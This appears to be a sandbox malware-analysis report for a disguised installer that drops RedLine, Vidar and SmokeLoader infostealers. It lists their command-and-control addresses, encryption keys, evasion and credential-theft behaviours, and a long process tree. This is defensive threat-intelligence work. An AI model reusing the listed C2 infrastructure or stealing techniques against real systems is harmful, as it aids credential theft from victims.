Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Resubmissions

11/07/2024, 05:43 UTC

240711-gej4lstgrf 10

06/09/2021, 14:13 UTC

210906-rjpvrsedbm 10

08/07/2021, 11:08 UTC

210708-4gztl3mwl6 10

08/07/2021, 08:02 UTC

210708-klfb4qeda6 10

07/07/2021, 09:39 UTC

210707-nem57xyvf2 10

06/07/2021, 17:51 UTC

210706-7pcrmjy3fa 10

06/07/2021, 13:45 UTC

210706-eybelwcq86 10

Analysis

  • max time kernel
    1800s
  • max time network
    1812s
  • platform
    windows10_x64
  • resource
    win10v20210410
  • submitted
    02/07/2021, 07:13 UTC

General

Malware Config

Extracted

Family

redline

Botnet

ServAni

C2

87.251.71.195:82

Extracted

Family

vidar

Version

39.4

Botnet

706

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    706

Extracted

Family

smokeloader

Version

2020

C2

http://ppcspb.com/upload/

http://mebbing.com/upload/

http://twcamel.com/upload/

http://howdycash.com/upload/

http://lahuertasonora.com/upload/

http://kpotiques.com/upload/

rc4.i32
1
0x3b22e540
rc4.i32
1
0xa6b397e0

Extracted

Family

vidar

Version

39.4

Botnet

932

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    932

Extracted

Family

vidar

Version

39.4

Botnet

865

C2

https://sergeevih43.tumblr.com

Attributes
  • profile_id

    865

Signatures

  • Contains code to disable Windows Defender 1 IoCs

    A .NET executable tasked with disabling Windows Defender capabilities such as realtime monitoring, blocking at first seen, etc.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 3 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 6 IoCs
  • ASPack v2.12-2.42 8 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Blocklisted process makes network request 1 IoCs
  • Downloads MZ/PE file
  • Executes dropped EXE 64 IoCs
  • UPX packed file 4 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Checks BIOS information in registry 2 TTPs 2 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 17 IoCs
  • Reads local data of messenger clients 2 TTPs

    Infostealers often target stored data of messaging applications, which can include saved credentials and account information.

  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 10 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 3 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 1 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • autoit_exe 1 IoCs

    AutoIT scripts compiled to PE executables.

  • Drops file in Program Files directory 12 IoCs
  • Drops file in Windows directory 1 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 11 IoCs
  • Checks SCSI registry key(s) 3 TTPs 12 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 6 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 2 IoCs
  • Enumerates system info in registry 2 TTPs 3 IoCs
  • Kills process with taskkill 2 IoCs
  • Modifies Internet Explorer settings 1 TTPs 3 IoCs
  • Modifies data under HKEY_USERS 15 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: MapViewOfSection 5 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 8 IoCs
  • Suspicious use of SetWindowsHookEx 4 IoCs
  • Suspicious use of UnmapMainImage 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
    1⤵
      PID:1084
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s Browser
      1⤵
        PID:2752
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2384
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
          • Suspicious use of AdjustPrivilegeToken
          PID:2360
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
          1⤵
            PID:2332
          • c:\windows\system32\svchost.exe
            c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
            1⤵
              PID:2272
            • c:\windows\system32\svchost.exe
              c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
              1⤵
                PID:1892
              • c:\windows\system32\svchost.exe
                c:\windows\system32\svchost.exe -k netsvcs -s SENS
                1⤵
                  PID:1356
                • c:\windows\system32\svchost.exe
                  c:\windows\system32\svchost.exe -k netsvcs -s UserManager
                  1⤵
                    PID:1288
                  • c:\windows\system32\svchost.exe
                    c:\windows\system32\svchost.exe -k netsvcs -s Themes
                    1⤵
                      PID:1196
                    • c:\windows\system32\svchost.exe
                      c:\windows\system32\svchost.exe -k netsvcs -s Schedule
                      1⤵
                      • Drops file in System32 directory
                      PID:932
                      • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                        C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                        2⤵
                          PID:2436
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:4808
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:5396
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:4500
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:5800
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:5172
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:5600
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:5080
                        • C:\Users\Admin\AppData\Roaming\ejvjbva
                          C:\Users\Admin\AppData\Roaming\ejvjbva
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:5168
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:5648
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:5352
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:5780
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:1608
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:5680
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:4748
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:4832
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:4704
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:1000
                        • C:\Users\Admin\AppData\Roaming\ejvjbva
                          C:\Users\Admin\AppData\Roaming\ejvjbva
                          2⤵
                          • Executes dropped EXE
                          • Loads dropped DLL
                          • Checks SCSI registry key(s)
                          • Suspicious behavior: MapViewOfSection
                          PID:1516
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                          • Executes dropped EXE
                          PID:3956
                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                          2⤵
                            PID:5596
                          • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                            C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                            2⤵
                              PID:4484
                            • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                              C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                              2⤵
                                PID:2100
                              • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                2⤵
                                  PID:5212
                                • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                  C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                  2⤵
                                    PID:5872
                                  • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                    C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                    2⤵
                                      PID:5480
                                    • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                      C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                      2⤵
                                        PID:2424
                                      • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                        C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                        2⤵
                                          PID:4384
                                        • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                          C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                          2⤵
                                            PID:4480
                                          • C:\Users\Admin\AppData\Roaming\ejvjbva
                                            C:\Users\Admin\AppData\Roaming\ejvjbva
                                            2⤵
                                            • Loads dropped DLL
                                            • Checks SCSI registry key(s)
                                            • Suspicious behavior: MapViewOfSection
                                            PID:5136
                                          • C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                            C:\Users\Admin\AppData\Local\Temp\b67c9bd46f\nrbux.exe
                                            2⤵
                                              PID:5192
                                          • c:\windows\system32\svchost.exe
                                            c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
                                            1⤵
                                              PID:68
                                            • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (2).exe
                                              "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install - копия (2).exe"
                                              1⤵
                                              • Suspicious use of WriteProcessMemory
                                              PID:4060
                                              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                                                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                                                2⤵
                                                • Executes dropped EXE
                                                • Suspicious use of WriteProcessMemory
                                                PID:1744
                                                • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\setup_install.exe
                                                  "C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\setup_install.exe"
                                                  3⤵
                                                  • Executes dropped EXE
                                                  • Loads dropped DLL
                                                  • Suspicious use of WriteProcessMemory
                                                  PID:2468
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c arnatic_1.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:2936
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_1.exe
                                                      arnatic_1.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Modifies system certificate store
                                                      PID:2620
                                                      • C:\Windows\SysWOW64\WerFault.exe
                                                        C:\Windows\SysWOW64\WerFault.exe -u -p 2620 -s 1728
                                                        6⤵
                                                        • Suspicious use of NtCreateProcessExOtherParentProcess
                                                        • Program crash
                                                        PID:4524
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c arnatic_3.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1280
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_3.exe
                                                      arnatic_3.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      • Suspicious use of WriteProcessMemory
                                                      PID:4064
                                                      • C:\Windows\SysWOW64\rUNdlL32.eXe
                                                        "C:\Windows\system32\rUNdlL32.eXe" "C:\Users\Admin\AppData\Local\Temp\axhub.dll",axhub
                                                        6⤵
                                                        • Loads dropped DLL
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        • Suspicious use of WriteProcessMemory
                                                        PID:4088
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c arnatic_5.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:1580
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_5.exe
                                                      arnatic_5.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Suspicious use of AdjustPrivilegeToken
                                                      PID:2156
                                                      • C:\Users\Admin\AppData\Roaming\7398983.exe
                                                        "C:\Users\Admin\AppData\Roaming\7398983.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious use of AdjustPrivilegeToken
                                                        PID:4272
                                                      • C:\Users\Admin\AppData\Roaming\7905267.exe
                                                        "C:\Users\Admin\AppData\Roaming\7905267.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Adds Run key to start application
                                                        PID:4440
                                                        • C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe
                                                          "C:\Users\Admin\AppData\Roaming\WinHost\WinHoster.exe"
                                                          7⤵
                                                          • Executes dropped EXE
                                                          PID:4564
                                                      • C:\Users\Admin\AppData\Roaming\4460127.exe
                                                        "C:\Users\Admin\AppData\Roaming\4460127.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        • Suspicious behavior: EnumeratesProcesses
                                                        PID:4780
                                                      • C:\Users\Admin\AppData\Roaming\3466090.exe
                                                        "C:\Users\Admin\AppData\Roaming\3466090.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:5088
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /c arnatic_6.exe
                                                    4⤵
                                                    • Suspicious use of WriteProcessMemory
                                                    PID:3004
                                                    • C:\Users\Admin\AppData\Local\Temp\7zS0D638B24\arnatic_6.exe
                                                      arnatic_6.exe
                                                      5⤵
                                                      • Executes dropped EXE
                                                      • Checks computer location settings
                                                      PID:3476
                                                      • C:\Users\Admin\Documents\eL5kVsaYnZs75tUGGXu5BbeB.exe
                                                        "C:\Users\Admin\Documents\eL5kVsaYnZs75tUGGXu5BbeB.exe"
                                                        6⤵
                                                        • Executes dropped EXE
                                                        PID:4504
                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --hold https://ezsearch.ru
                                                          7⤵
                                                          • Loads dropped DLL
                                                          • Enumerates system info in registry
                                                          • Suspicious use of FindShellTrayWindow
                                                          PID:4608
                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0xd0,0xd4,0xd8,0xac,0xdc,0x7ff95ef74f50,0x7ff95ef74f60,0x7ff95ef74f70
                                                            8⤵
                                                              PID:4624
                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --gpu-preferences=SAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAoAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAB4AAAAAAAAAHgAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAAIAAAAAAAAAAgAAAAAAAAA --mojo-platform-channel-handle=1504 /prefetch:2
                                                              8⤵
                                                                PID:4788
                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=network --mojo-platform-channel-handle=1880 /prefetch:8
                                                                8⤵
                                                                  PID:4964
                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2280 /prefetch:8
                                                                  8⤵
                                                                    PID:4988
                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2820 /prefetch:1
                                                                    8⤵
                                                                      PID:3696
                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2840 /prefetch:1
                                                                      8⤵
                                                                        PID:3712
                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3484 /prefetch:1
                                                                        8⤵
                                                                          PID:4388
                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3620 /prefetch:1
                                                                          8⤵
                                                                            PID:4536
                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3836 /prefetch:1
                                                                            8⤵
                                                                              PID:5044
                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --extension-process --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1824 /prefetch:1
                                                                              8⤵
                                                                                PID:2892
                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5760 /prefetch:8
                                                                                8⤵
                                                                                  PID:3080
                                                                                • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                  "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --configure-user-settings --verbose-logging --system-level --channel --force-configure-user-settings
                                                                                  8⤵
                                                                                    PID:4500
                                                                                    • C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\89.0.4389.114\Installer\chrmstp.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=89.0.4389.114 --initial-client-data=0x23c,0x240,0x244,0x218,0x248,0x7ff720bda890,0x7ff720bda8a0,0x7ff720bda8b0
                                                                                      9⤵
                                                                                        PID:4584
                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5736 /prefetch:8
                                                                                      8⤵
                                                                                        PID:3464
                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=3812 /prefetch:8
                                                                                        8⤵
                                                                                          PID:4812
                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5600 /prefetch:8
                                                                                          8⤵
                                                                                            PID:4800
                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3552 /prefetch:8
                                                                                            8⤵
                                                                                              PID:4808
                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3720 /prefetch:8
                                                                                              8⤵
                                                                                                PID:2440
                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5620 /prefetch:8
                                                                                                8⤵
                                                                                                  PID:4540
                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3744 /prefetch:8
                                                                                                  8⤵
                                                                                                    PID:4544
                                                                                                  • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                    "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3552 /prefetch:8
                                                                                                    8⤵
                                                                                                      PID:3948
                                                                                                    • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                      "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=3492 /prefetch:8
                                                                                                      8⤵
                                                                                                        PID:4032
                                                                                                      • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                        "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5640 /prefetch:8
                                                                                                        8⤵
                                                                                                          PID:1696
                                                                                                        • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                          "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2224 /prefetch:8
                                                                                                          8⤵
                                                                                                            PID:4312
                                                                                                          • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                            "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5404 /prefetch:8
                                                                                                            8⤵
                                                                                                              PID:4828
                                                                                                            • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                              "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5396 /prefetch:8
                                                                                                              8⤵
                                                                                                                PID:4952
                                                                                                              • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=5400 /prefetch:8
                                                                                                                8⤵
                                                                                                                  PID:732
                                                                                                                • C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --field-trial-handle=1496,15227695844126246498,7405956202695477216,131072 --disable-gpu-compositing --lang=en-US --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=27 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1412 /prefetch:1
                                                                                                                  8⤵
                                                                                                                    PID:2452
